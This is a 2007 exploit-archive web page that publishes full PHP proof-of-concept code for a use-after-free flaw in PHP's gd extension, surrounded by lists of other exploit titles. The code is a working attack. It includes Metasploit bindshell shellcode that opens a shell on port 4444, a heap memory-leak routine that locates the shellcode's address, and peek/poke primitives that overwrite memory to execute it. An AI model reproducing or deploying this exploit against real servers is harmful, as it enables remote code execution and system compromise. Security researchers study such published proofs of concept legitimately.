exploits , vulnerabilities , articles , PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit

2007-06-15 XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-08 NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit
2007-06-07 Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
2007-06-06 Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
2007-05-24 cpCommerce <= 1.1.0 (category.php id_category) SQL Injection Exploit
2007-05-24 Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit

2007-03-20

PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit

Rated as : High Risk

<?php
 
////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___ 
//
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
//
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
//
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
//
  //                                                                   
//
  //         Proof of concept code from the Hardened-PHP Project       
//
  //                   (C) Copyright 2007 Stefan Esser                 
//
  //                                                                   
//
 
////////////////////////////////////////////////////////////////////////
  //             PHP gd already freed resource usage exploit           
//
 
////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // linux x86 bindshell on port 4444 from Metasploit
  $shellcode =
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
     
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
     
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
     
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
     
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
     
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
      "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

  // Offsets used for the overwrite (will be overwritten by findOffsets()
  $offset_1 = 0x55555555;
  $offset_2 = 0x66666666;
  
  findOffsets(); // Comment out if you want to just test the crash

  class dummyclass { }

  function myErrorHandler()
  {
    imagedestroy($GLOBALS['img']);
    
    // Clipping
    $GLOBALS['x'] = str_repeat(chr(0), 7311);
    $GLOBALS['x'][7310] = chr(0x00);  
    $GLOBALS['x'][7309] = chr(0x01);  
    $GLOBALS['x'][7308] = chr(0x00);  

    $GLOBALS['x'][7307] = chr(0x7f);  
    $GLOBALS['x'][7306] = chr(0xff);  
    $GLOBALS['x'][7305] = chr(0xff);  
    $GLOBALS['x'][7304] = chr(0xff);  

    $GLOBALS['x'][7303] = chr(0);  
    $GLOBALS['x'][7302] = chr(0);  
    $GLOBALS['x'][7301] = chr(0);  
    $GLOBALS['x'][7300] = chr(0);  

    $GLOBALS['x'][7299] = chr(0x80);  
    $GLOBALS['x'][7298] = chr(0);  
    $GLOBALS['x'][7297] = chr(0);  
    $GLOBALS['x'][7296] = chr(0);  

    // True Color Image
    $GLOBALS['x'][0x1c38] = chr(1);
    // True Color Pixelmap (1st entry must be 0)
    $GLOBALS['x'][0x1c3c] = chr(0x08);
    $GLOBALS['x'][0x1c3d] = chr(0x80);
    $GLOBALS['x'][0x1c3e] = chr(0x04);
    $GLOBALS['x'][0x1c3f] = chr(0x08);

    return true;
  }
  
  function poke($addr, $value)
  {
    $GLOBALS['img'] = imagecreate(1, 1);
    imagesetpixel($GLOBALS['img'], $addr >> 2, new dummyclass(),
$value);
  }
  
  function peek($addr)
  {
    $GLOBALS['img'] = imagecreate(1, 1);
    return imagecolorat($GLOBALS['img'], $addr >> 2, new
dummyclass());
  }
  
  printf("Using offsets %08x and %08x\n", $offset_1,
$offset_2);
  
  error_reporting(E_ALL);
  set_error_handler("myErrorHandler");
  poke($offset_2, $offset_1);
  unset($d);
















  // This function uses the substr_compare() vulnerability
  // to get the offsets. 
  
  function findOffsets()
  {
    global $offset_1, $offset_2, $shellcode;
    // We need to NOT clear these variables,
    //  otherwise the heap is too segmented
    global $memdump, $d, $arr;
    
    $sizeofHashtable = 39;
    $maxlong = 0x7fffffff;

    // Signature of a big endian Hashtable of size 256 with 1 element
    $search =
"\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00";

    $memdump = str_repeat("A", 18192);
    for ($i=0; $i<400; $i++) {
	  $d[$i]=array();
    }
    unset($d[350]);
    $x = str_repeat("\x01", $sizeofHashtable);
    unset($d[351]);
    unset($d[352]);
    $arr = array();
    for ($i=0; $i<129; $i++) { $arr[$i] = 1; }
    $arr[$shellcode] = 1;
    for ($i=0; $i<129; $i++) { unset($arr[$i]); }

    // If the libc memcmp leaks the information use it
    // otherwise we only get a case insensitive memdump
    $b = substr_compare(chr(65),chr(0),0,1,false) != 65;

    for ($i=0; $i<18192; $i++) {
      $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
      $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
      if ($y-$Y == 1 || $Y-$y==1){
        $y = chr($y);
        if ($b && strtoupper($y)!=$y) {
          if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
            $y = strtoupper($y);
          }
        }
        $memdump[$i] = $y;
      } else {
  	    $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
        $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);
        if ($y-$Y != 1 && $Y-$y!=1){
	      $memdump[$i] = chr(1);
        } else {
          $memdump[$i] = chr(0);
        }   
      }
    }
    
    // Search shellcode and hashtable and calculate memory address
    $pos_shellcode = strpos($memdump, $shellcode);
    $pos_hashtable = strpos($memdump, $search);
    
    if ($pos_shellcode == 0 || $pos_hashtable == 0) {
      die ("Unable to find offsets");
    }
    
    $addr = substr($memdump, $pos_hashtable+6*4, 4);
    $addr = unpack("L", $addr);
    // Fill in both offsets  
    $offset_1 = $addr[1] + 32;
    $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;
  }
?>
securitydot.net - 2007-03-20

Exploits - newest 10 RSS | More

2007-06-15 56712 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33829 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41950 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29034 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19518 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16500 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19167 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16365 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33303 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17026 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit